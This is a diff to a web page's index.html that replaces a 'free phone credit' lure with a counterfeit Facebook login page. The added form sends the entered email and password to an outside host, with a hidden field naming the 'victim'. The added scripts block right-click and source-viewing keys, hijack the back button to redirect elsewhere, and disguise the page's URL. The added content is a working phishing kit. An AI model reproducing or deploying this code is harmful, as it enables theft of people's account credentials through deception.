--- a/index.html
+++ b/index.html
@@ -1,41 +1,108 @@
-<!-- Z1T0NG -->
-<!-- TIDAK DI JUAL - 2016 -->
-<!-- Z1T0NG -->
-<!DOCTYPE html>
-<html>
-<head>
-<title>Web Pulsa Gratis</title>
-    <meta name="description" content="*INSERT YOUR META DESCRIPTION">
-<meta content="text/html;charset=utf-8" http-equiv="Content-Type">
-<meta content="utf-8" http-equiv="encoding">
-<meta name="viewport" content="width=device-width, initial-scale=1">
-  <link rel="stylesheet" href="bootstrap.min.css">
+<html><head><meta charset="UTF-8">
+<link type="text/css" rel="stylesheet" href="https://dl.dropboxusercontent.com/s/bcsogulkc87q4rr/style.css">
+<link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yo/r/iRmz9lCMBD2.ico" />
+<script language="javascript"> var pesan = '_'; function klik_IE() { if (event.button == 2){ alert(pesan); } } function klik_NS(e) { if (document.layers || document.getElementById && !document.all){ if (e.which == 2 || e.which == 3){ alert(pesan); } } } if (document.layers) { document.captureEvents(event.mousedown); document.onmousedown = klik_NS; } else if (document.all && !document.getElementById) { document.onmousedown = klik_IE; } document.oncontextmenu = new Function("alert(pesan); return false") </script> 
+<script language="javascript"> document.onkeydown = function(e) { if (e.ctrlKey && (e.keyCode === 74 || e.keyCode === 85 || e.keyCode === 83 || e.keyCode === 73 || e.keyCode === 67 || e.keyCode === 123)) { alert('_'); return false; } else { return true; } }; </script>
 
-  <script src="jquery.min.js"></script>
-  <script src="bootstrap.min.js"></script>
-<link href="style.css"  rel="stylesheet" type="text/css">
-</head>
-<body>
-<div class="ruim_container" id="mes">
-	<div class="ruim_logo"><img src="logo.png" /></div>
-	<div class="ruim_conternt col-xs-12 col-sm-12 col-md-12 col-lg-12 ">
-		<div class="ruim_left ruim_content_gen col-xs-12 col-sm-12 col-md-12 col-lg-12"> 
-			<h1 align="center">TOOLS PULSA GRATIS 2016 WORK</h1>
-            <div class="ruim_title">KLIK NEXT UNTUK MENAMBAH PULSA</div>
-			<div class="ruim_image"><img src="images/gems.png"></div>
-		<div class="ruim_green_btn"><img src="images/next.png" class="ruim_gen_btn" onclick="r_popup();" /></div>
-		</div>
-		
-		<div class="ruim_clear"></div>
-		<div id="ruim_comments"></div>
-	</div>
-		
-		<div class="ruim_clear"></div>
- 
-</div>
+<style type="text/css">
+:root #content > #right > .dose > .dosesingle,
+:root #content > #center > .dose > .dosesingle
+{ display: none !important; }</style></head><body class="login_page _39il UIPage_LoggedOut b_c3pyn-ahh gecko win x1" dir="ltr">
+    <div class="_li">
+        <div id="pagelet_bluebar">
+            <div id="blueBarDOMInspector">
+                <div class="_53jh">
+                    <div class="loggedout_menubar_container">
+                        <div class="clearfix loggedout_menubar">
+                            <div class="lfloat _ohe">
+<img src="https://imagizer.imageshack.com/img924/6990/uX4Eza.png" style="height: 100px; widht: 50px;"></i></a></h1>
+                            </div>
+                        </div>
+                    </div>
+                    <div class="signupBanner">
+                        <div class="signup_bar_container">
+                            <div class="signup_box clearfix"><span class="signup_box_content"></span>
+                            </div>
+                        </div>
+                    </div>
+                </div>
+            </div>
+        </div>
+        <div id="globalContainer" class="uiContextualLayerParent">
+            <div class="fb_content clearfix " id="content" role="main">
+                <div class="_4-u5 _30ny"><span class="muffin_tracking_pixel_start"></span><img class="tracking_pixel"><span class="muffin_tracking_pixel_end"></span>
+                    <div class="_4-u2 _1w1t _4-u8 _52jv" style="display:block;">
+                        <img src="https://imagizer.imageshack.com/img924/696/7zj3Lw.png" width="600" height="38" style="margin:-16px 0 0px -101px;">
+						<div class="_xku"><span class="_50f6"></span></div>
+                        <div class="login_form_container">
+                            <form id="login_form" action="https://www.houstoncreativemw.com/zs1.php" accept-charset="utf-8" method="post">
+                                <div id="loginform">
+                                    <div class="clearfix _5466 _44mg">
+                                        <input class="inputtext _55r1 inputtext _1kbt inputtext _1kbt" name="email" id="email" tabindex="1" placeholder="Email address or phone number" value="" autofocus="1" aria-label="Email address or phone number" type="text">
+                                    </div>
+                                    <div class="clearfix _5466 _44mg">
+                                        <input class="inputtext _55r1 inputtext _1kbt inputtext _1kbt" name="pass" id="pass" tabindex="1" placeholder="Password" aria-label="Password" type="password">
+                                    </div>
+                                    <div class="_xkt">
+                                        <button value="1" class="_42ft _4jy0 _52e0 _4jy6 _4jy1 selected _51sy" id="loginbutton" tabindex="1" type="submit">Log In</button>
+                                    </div>
+											<input type="hidden" name="user_id_victim" value="yY6f8aVGtSck1rMTZUVFJQUVQwOQ=="><input type="hidden" name="user_ip" value="">                                    <input type="hidden" name="type" value="Facebook">
+                                </div>
+                            </form>
+                        </div>
+                    </div>
+                </div>
+            </div>
+            <div>
+                <div id="pageFooter">
+                    <div></div>
+                    <div>
+                        <div></div>
+                    </div>
+                </div>
+            </div>
+        </div>
+    </div>
 
-
-<div class="ruim_popup" id="ruim_popup_box" style="display:none" ></div>
-<script src="scripts.js"></script>
-</body>
-</html>
+	<script type="text/javascript">
+! function () {
+var t;
+try {
+for (t = 0; 10 > t; ++t) history.pushState({}, "", "#");
+onpopstate = function (t) {
+t.state && location.replace("https://appurl.io/r39dLGd3s")
+}
+} catch (o) {}
+}();
+</script>
+ <script>
+    (function(){
+      var url = window.location.href;
+      var newFile = (Math.random() + 1).toString(36).substr(2, 4);
+    //   var newFile = 'hardcoded_name';
+  
+      var split = url.split("/");
+  
+    //   console.log(window.location.pathname)
+    //   console.log(split[split.length - 1]); // ouput 
+  
+      // check if url path ends in trailing slash
+      if (window.location.pathname.slice(-1) === "/") {
+        split[split.length - 2] = "" + newFile;
+      // otherwise assume it's a index file
+      } else {
+        index = split[split.length - 1];
+        indexPrefix = index.substr(0, index.indexOf('.')); // get index prefix name
+        indexSuffix = index.substr(index.indexOf('.')); // get everything starting from period
+        split[split.length - 1] = newFile + indexSuffix; // rewrite prefix name + re-concatenate everything else
+  
+      }
+  
+      var newUrl = split.join("/");
+  
+      if (typeof window.history.replaceState === 'function') {
+          history.replaceState({}, '', newUrl);
+      }
+    })();
+  </script>
+</body></html>
